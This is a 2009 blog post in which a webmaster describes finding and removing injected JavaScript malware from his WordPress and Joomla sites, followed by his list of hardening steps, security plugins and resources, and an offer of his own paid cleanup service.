'How To Guide' for securing WordPress and protecting websites.

June 9, 11:14 PMDenver Tools and Technology ExaminerMileHighTechGuy Jeff Kemp

Previous Next

2 comments Print Email RSS Subscribe

Subscribe

Get alerts when there is a new article from the Denver Tools and Technology Examiner. Read Examiner.com's terms of use.

Email Address   Include other special offers from Examiner.com Terms of Use

I've finally eradicated the virus that has plagued my WordPress blog for almost 2 weeks now!

Woohoo, after a 2 week crash course in web security and learning how to lock down WordPress, it's finally time for me to get back to blogging again! 

As another 'How To Guide' for securing WordPress, this post is an attempt to summarize some of the things that I learned about web security, the methods that I used to identify malware was on my website, and the many resources I currently use to secure my website from future malware attacks.

About 2 weeks ago I realized that several of my websites were hacked and some malicious code had been inserted into them. I know I'm not the only one who has dealt with or is currently dealing with website hacking, viruses, malicious code injections, and overall blog security...so hopefully summarizing my experience will help someone out there get a handle on any problems they are having.

HOW I DISCOVERED THAT MY WEBSITE HAD BEEN HACKED:

The first thing that brought to my attention that I might have a problem with my website is that someone mentioned to me that when they went to one of my websites that their virus detector warned them that my site had malware. Since this was the first time I had heard of any problems with any of my websites, I was surprised and at first I didn't believe it, and thought it might just be some tracking code that I use from Google Analytics or Quantcast(which was not the case).

Then next thing that clued me in to the fact that I had malware injected into my website was that my RSS feed for my blog under WordPress would no longer validate.

So after searching the WordPress forums I ended up shooting an email to WordPress Support, and I was pleasantly surprised that they responded quickly with an answer, but unpleasantly surprised when WordPress Support advised me that my website had been hacked! They noticed some JavaScript code stuck at the bottom of my index.php in the root WordPress directory that didn't belong there since it was apparently injected outside of the closing html tag < / html > at the bottom of the page.

I found validating the site's RSS feed to be one of the best methods for quickly determining if a website has been hacked and injected with malware:

To see if your website contains malware, go to feedvalidator.org and test your RSS feed to see if your feed validates. If your RSS feed doesn't validate then you probably have some malicious script injected into your web page which creates a malformed RSS feed which prevents it from validating.

For WordPress users the URL for your RSS feed should be like this:

http://your-wordpress-domain.com/feed

OTHER SYMPTOMS AND TELL-TALE SIGNS THAT MY WEBSITE HAD BEEN HACKED:

Another indicator that my site had been hacked was that I noticed that as one of my web pages loaded it would take an inordinate amount of time to load, and that the status bar within the browser would indicate that my website was reaching out to some unfamiliar domain like zctk.ru or pwgegrsdfs.ru.

I could see it happening, but when I searched my web pages with a word search these domains didn't show up since the malicious code was comprised of JavaScript with a bunch of 'unescapes' using encrypted code that hid these domains.

I even found that there was some bogus code that was very well disguised to look like Google Analyticscode (I think only a trained eye would even see this one).

Also, when loading my site under Safari (which I only do on occassion since I am a big huge FireFox fan), I would get a warning that my site was unsafe and that Safari advised that I shouldn't load that web page.

You can check your site for malware by using the free online tools Norton Safe Web or McAfee Site Advisor, but there is no guarantee that these sites will identify your site as having a virus (however these sites are useful for identifying suspected blacklist sites if they are notorious enough).

Digging deeper, to my horror and further embarrasement I discoverd that not only was the virus injecting malicious code into my web pages, but it had also created a folder within the root of one of my parked web domains that contained about 100 html pages of some terrible stuff that I won't mention here. This domain is not a place I would normally look at since it is a parked domain that I've had for over a year that I have tagged mentally for 'long term' plans for development and basically ignored, so there should have been nothing (no files or folders) within this domain. Yet another reason why security should be the first thing on your mind even pertaining to parked domains or old installs of Joomla, etc.

THE SCOPE OF THE PROBLEM:

I have several websites at various stages of development. This blog (www.MileHighTechGuy.com) is a fairly recent WordPress site (see post of this websites history) hosted as an add-on domain with HostGator under my main domain and account. Using add-on domains helps me to manage my sites and my customer's sites centrally with uniform security and management tools.

Even though I have several websites I initially suspected my WordPress site as the culprit since this virus seemed to show up soon after installing WordPress (although inconclusive, later I found WordPress to not necessarily be the leak in security, but possibly Joomla was since I hadn't implemented any security for the domain containing the Joomla install once it was installed...I may never really know 100% if this was the case).

With further investigation I found that there was malicious code in the form of either JavaScript or an iFrame that was injected outside of the closing html tag < / html > at the bottom of just about every index.php, index.html, and default.html file within my whole website tree within my hosted web package with HostGator.

So the scope of the problem, like a cancer, seemed to have infiltrated all of my domains, not just my WordPress blog.

The infection included 2 Joomla sites, a standard HTML site, and a couple of parked domains awaiting development. (And as I mentioned, the virus may have possibly originated with the Joomla install even though it was my WordPress install which I was focusing on fixing).

With even more investigation I found malicous code had even infected directories outside of the public_html directory that I upload files to, but the infection had also corrupted files within the 'tmp' folder hosted on HostGator's server in the root of my HostGator account that holds web logs and reports such as AWStats and Webalizer.

With the recent knowledge that my whole web tree was infected and not just my WordPress blog, I knew I was in a real fight that could even affect my livelyhood if I didn't come out on top (and soon!), so I began searching the web in earnest for information on locking down all of my websites, not just WordPress.

RECURRING PROBLEM:

Before I list out the steps that I took to finally gain victory over this malicious attack which took 2 weeks out of my planned schedule to address fixing it, I want to mention that going through the cycle below time and time again is what is took to erradicate this virus and to keep the virus from returning:

1. I would remove the malicous code (once I learned all of the many places my website had been compromised)...
2. Try a solution to secure my website (from the list below)...
3. Give it a little time (usually 2-3 hours is all it would take for the malicious code to show up again)...
4. Then look for signs of the virus to see if it was still present (usually attempting to validate my RSS feed was the quickest way to see if the virus had returned).

Rinse & repeat...

WHY LOCK DOWN WORDPRESS AND PROTECT YOUR WEBSITES:

I'm going to keep this short and simple. I recommend implementing the security measures mentioned within this post for even the casual blogger or website owner for the following reasons:

Keep malicious code and viruses from infecting your customers or site visitors.

Having a virus infected website hurts your reputation if you are a web developer, web designer, blogger, IT person, or just a self proclaimed 'tech head'.

WordPress is the most popular blogging platform in the world, so if you use WordPress you are a huge target for malware and you will eventually become a web hack victim if you do nothing.

Don't let your website be used by spammers.

Don't let your website be used by unscrupulous jerks (putting it mildly to keep this G Rated!) who want to exploit your website for their malicious purposes.

Keep malicious code and viruses from infecting your local computers that you use to manage your website.

Viruses can hurt your bandwidth, you web traffic, and your search engine page ranking.

There are probably many more reasons!

WordPress is a great platform for blogging and creating websites, but out-of-the-box it has vulnerabilities that need to be addressed immediately after a new installation. I believe that new and unprotected installations of WordPress is where most malicious attacks occur.

Many WordPress users probably think they can simply:

• Install WordPress.
• Configure WordPress.
• Install a theme.
• Install some useful plugins.
• Make some basic design modifications.
• Begin blogging and live happily ever after!

Rather, what WordPress users should do immediately after installing WordPress is to do some basic research about WordPress security, then immediately implement basic security measures to lock down and secure WordPress before proceeding on to other tasks.

If WordPress users don't immediately secure their WordPress installation they will likely soon become a victim of malicious attacks on their website resulting in exploitations of vulnerabilities, which typically includes malware being injected into their website.

So I highly advise anyone starting out fresh with a new WordPress site to take the necessary precautions as outlined below immediately.

Similarly, if anyone is considered a newbie with WordPress, Joomla, Drupal, Mambo, or any other CMS (Content Management System) or blogging platform, they should research and implement security measures as a priority before website creation and design. Every hour a site is not protected increases the chance of a 'bot' exploiting some aspect of a website installation.

HOW TO LOCK DOWN WORDPRESS, REMOVE MALICIOUS CODE, AND PROTECT YOUR WEBSITES:

Most of the security measures outlined below apply to WordPress, and some apply to general websites, but each platform has it's own distinct methods for protecting it's vulnerabilities, thus I encourage you to research what will suit your case best depending on your configuration.

In my recent research and in learning how to erradicate the malicious code that infected my websites I learned that there is no 'silver bullet' that exists such as a simple plugin solution that solves every problem of vulnerability and protects your websites and your computer.

A multi-pronged approach with a diversified strategy is recommended as the best approach to protecting your website from the many various types of potential threats that exist.

SECURING WORDPRESS

The following is a summary of the steps that I took over the course of 2 weeks to secure WordPress and to erradicate a malicious virus that had infected my websites (with some further explanation and detail provided later in this post). I would recommend taking all of these measures (and perhaps more) as soon as possible to protect your WordPress blog and to protect all of your websites from malware:

1. Keep WordPress updated to the latest version (always backup first...the same goes for any other web platforms you may have installed such as Joomla, Drupal, etc).
2. Identify if you have malware on your website.
3. Remove any identified malicious code within your web pages by reviewing the remote pages either via FTP or using the web console provided by your web host; particularly look for and delete anything outside of the < / html > tag (global search and replace doesn't always work here since the threat may be disguised in various ways).
4. Install the recommended essential security plugins for WordPress.
5. Keep all of your plugins up-to-date (check for plugin updates daily if you can, or at least once per week).
6. Keep your computer protected with anti-virus software (for my Mac only Norton Antivirus for Mac detected any viruses, where ClamXav and iAntiVirus did not detect anything).
7. Use strong passwords (try this password generator from pctools; don't re-use the same passwords for many different accounts).
8. Update your passwords frequently (if you are suspicious of a keylogger resident on your computer try calling in to your host provider to make changes over the phone and see if the virus persists, thereby ruling out keyloggers to some degree if the problem returns).
9. Change the security keys in wp-config.php (use the WordPress security key generator to replace the existing keys).
10. CHMOD web file attributes (using the file manager within the web console provided by your web host):
    1. .htpasswd files to 640
    2. .htaccess files to 644
    3. index and default files to 644
    4. php files to 600
    5. chmod files that you really dont want people to see as 400
    6. any requested 777 to 766 instead (NEVER chmod 777, if something requires write access use 766)
11. Place .htaccess files where needed (see securing your website using htaccess section of this post).
12. Place empty index.html pages within the following directories: WordPress root, wp-content, wp-content/plugins, wp-content/uploads, and wp-includes (wp-content and plugins folders mandatory, the others only for extra measure).

Other security options to consider for advanced users:

• Rather than uploading your files using FTP try using SSH (PuTTY is free SSH software)
• PHPIDS (PHP-Intrusion Detection System)
• Maximum Security (not available yet)

LIST OF ESSENTIAL WORDPRESS PLUGINS FOR SECURING YOUR WORDPRESS INSTALLATION:

These are the WordPress plugins that I am currently using related to security:

1. Akismet (rated 9 out of 10)*:  Part of a standard WordPress installation that identifies and blocks comment and trackback spam on blogs.
2. Bad Behavior (rated 9 out of 10):  Blocks link spam and the robots which deliver it.
3. WordPress Firewall (rated 9 out of 10):  Investigates web requests with simple WordPress-specific heuristics to identify and stop most obvious attacks.
4. WordPress Table Rename (rated 9 out of 10):  Facilitates renaming all WordPress tables with a custom prefix helping prevent SQL injection attacks.
5. WP Security Scan (rated 9 out of 10):  Scans your WordPress installation for security vulnerabilities and suggests corrective actions.
6. DigoWatchWP (rated 8 out of 10):  Scans your blog posts and pages for changes and sends email notification of any changes.
7. Secure WordPress (rated 8 out of 10):  Performs basic security housekeeping for WordPress like remove error information on login page; adds index.html to plugin directory; removes the wp-version, except in admin area.
8. WP Scanner (rated 8 out of 10):  Scans your WordPress installation and provides a measure of your WordPress security level (requires install of WP-Scanner Activator; at time of this writing their site was down and throwing an internerl server error).
9. Paranoid911 (rated 8 out of 10):  Checks your WordPress directory with all subdirectories on the server's filesystem and a few WordPress database tables for changes and sends an email when changes occur.
10. Safer Cookie (rated 8 out of 10):  Ties the WordPress session cookie to the user’s IP address which ensures the cookie can’t be used to access the admin panel from another computer.
11. Tinfoil Hat (rated 8 out of 10):  Provides users with more configuration options regarding what information is sent by WordPress to sites other than your own.
12. HTML Purified (rated 7 out of 10):  Replaces the default WordPress comments filters with HTML Purifier, a super HTML filtering library to remove all malicious code (better known as XSS) from within comments (will also make your documents standards compliant).
13. Limit Login Attempts (rated 7 out of 10):  Limits the number of login attempts possible, therefor reducing brute-force password attacks.
14. AskApache Password Protect (rated 6 out of 10):  I was unable to use AskApache Password Protect since based on self-tests that this plugin runs my particular web host configuration was shown to not support it, but if you are able to make it work then I advise you give it a try.
15. WordPress Tweaks (rated 6 out of 10):  Adds many useful settings pertaining to comments, posts, SEO, security, the administration back-end. (Note: I discovered that 2nd & 3rd options of Comments and Pings section of WordPress Tweaks are not compatible with IntenseDebate plugin; disable these options if you use IntenseDebate).
16. WP All-in-One tools (rated 6 out of 10):  Performs basic security housekeeping for WordPress like replace WP-Version,  wp-config.php SECRET_KEY edit, image upload HTTP error fix, minimum comment length, etc. (similar to Secure WordPress plugin but covers different issues).

Beware that not all plugins play well together. The plugins within this list all work together for me, along with a couple of dozen other plugins that I am using. I find that I often need to do a process of elimination (disable plugins one-by-one) to find what plugins are not cooperating with other plugins. Note that some security based plugins for WordPress directly help to protect your WordPress installation, and others only serve to notifiy you of any malicious activity so that you can take corrective action.

SECURING YOUR WEBSITE USING .HTACCESS:

If you have a WordPress installation or general website that you are hosting with a web host provider or your own servers (in other words pretty much any website except for a WordPress site hosted by WordPress like http://you.wordpress.com), then in addition to using security related plugins for WordPress and other security methods mentioned already, you should also secure certain folder locations within your websites with .htaccess files containing code that will help to prevent unauthorized access and malicious attacks of your web files.

Advanced users can read here for more information about .htaccess files. (If you are fortunate enough to have an expert available for setting your Apache server configuration files such as mod_security, then use .htaccess in addition to other server related security measures.)

There are a lot of things you can do with .htaccess files, and many ways to 'skin a cat' using .htaccess files, so again this is not a comprehensive 'silver bullet' solution, but one suggested way to protect yourself that should be combined with other protective measures.

There is a fine balance between securing your website using .htaccess and breaking functionality...

In other words if you aren't really careful you may disable certain functionality on your website, especially with WordPress plugins. So be sure to check your website functionality, like plugins, rotating banners, comments, and your Admin login each time you make a change with .htaccess. Also run a check of your website functionality before using .htaccess just to be sure it isn't a plugin conflict (and not .htaccess) that is causing disruption to your website functionality.

I found that I had to dumb down several of the .htaccess suggestions that others had made on their websites just so that my website would work properly (just remark out any offending lines using the pound character '#' at the front of the command until everything works).

At the very least you should have a .htaccess file within the root of your public_html directory if you have many websites under that root, or possibly just the root of your website or WordPress installation if you are working with just one website.

Htaccess files are recursive, meaning if you place a .htaccess file in the root directory of your website then the scope of the .htaccess file also covers all subdirectories. Htaccess files located within subdomain directories or subdirectories will take precedence for that directory over .htaccess files located within higher level folders such as the root directory. This can be useful, for instance, for when you want to assign specific commands within your WordPress root or other sub-directories that apply only to WordPress or that particular folder but not to other sub-domains or folders within your public_html directory tree.

This link to the full post on my blog at www.MileHighTechGuy.com contains the actual code suggestions for your .htaccess files.

RECOMMENDED RESOURCES FOR SECURING WORDPRESS AND PROTECTING YOUR WEBSITES:

If you are not an advanced user you can just implement the suggestions within this post and bypass reading any of this other stuff...your choice.

The following are recommended resources for learning more about how to best secure your WordPress installation, a.k.a. 'locking down WordPress' or 'hardening WordPress', along with best practices for general website protection:

• 10 WORDPRESS SECURITY TIPS | LostInSearch.com
• Hardening WordPress with htaccess | BlogSecurity
• ELITE HTACCESS FOR WEBDEVELOPERS | evolt.org
• PERISHABLE PRESS 4G BLACKLIST
• Hardening WordPress With Mod Rewrite and htaccess | reaper-x.com
• A to Z of WordPress .htaccess Hacks | Nometech.com
• Hardening HT Access | SecurityFocus.com
• Comprehensive guide to .htaccess | JavaScriptKit.com
• .htaccess Tutorial - The Ultimate Htaccess Guide | AskApache.com
• Feed Validator.org

The above resource list is my best attempt to give credit where credit is due...so thank you to all of those who have shared this valuable security related information freely on the internet!

PLEASE SHARE YOUR KNOWLEDGE AND CONSTRUCTIVE COMMENTS:

Please feel free to comment on or correct anything within this post since I don't claim to be a WordPress, .htaccess, or website security guru!

Actually I'm pretty sure my site isn't as secure as it needs to be...so please lend your advice.

I'm certain that there are many other ways to lock down WordPress and to further secure websites beyond what I have put into place or noted. This is not by any means an all inclusive or exhaustive list for how to secure your websites, and there are certainly many other extemely qualified folks out there who have something to offer regarding 'hardening WordPress' and website security.

So I invite others to post constructive comments that provide additional resources and helpful advice on:

How to prevent website hacking to protect your websites in the first place (WordPress and general websites).

How to detect malware and malicious code to know that it is present in order to respond as quickly as possible in the event of a website hack.

How to erradicate malware once it is discovered including the best steps to take to deal with malware infections.

If you are a blog security or web security expert, here's your chance to post a link back to your website!

PROBABLY NOT THE END OF THE STORY:

Even though my websites seem safe for now, one thing I've always known, but am taking to heart especially now, is that the bad guys (like their evil master) are always coming up with new ways to exploit websites and computers and any vulnerabilities they can find. So this saga will likely continue as technology evovles and new exploits arise.

WordPress is upgrading from version 2.7.1 to 2.8 later this week on Wednesday June 10th, so I am hoping that with this upgrade that the folks at WordPress have incorporated more built-in security measures in addition to some promising new features.

Yet with every upgrade of any software there are inevitably new vulnerabilities that arise, particularly with 3rd party plugins. I'm certainly not an expert after a 2 week crash course on web security, but at least I think that because of this struggle I've learned something about blog security and web security (and implemented it), so I feel I am actually in a better place for the struggle that I've had to fight.

Please link back to this site, and Stumble it!

As always, I'd like to hear your comments.

NOTE: Any updates to this topic are posted at my website here:

http://milehightechguy.com/how-to-guide-for-securing-wordpress-and-protecting-websites/

This is a common problem for many website owners and webmasters, so if you need help I now offer a service to get rid of viruses infecting your website and to secure your website. The cost is $250 for most websites, with an option of $50/month for continued monitoring and updated protection. That way you can go about your business and not have to deal with this problem, which for me took a full month out of my busy schedule and also took my site down for a while. I think it is well worth the cost of having someone else (like myself as a consultant) deal with the security problem so that you can focus on your business and not wake up each day wondering if your site was hacked again.

Let me know if you'd be interested in having me manage your website security, and generally how it goes for you.

~Jeff (MileHighTechGuy)

Jeff Kemp, MileHighTechGuy (Golden, CO), www.MileHighTechGuy.com.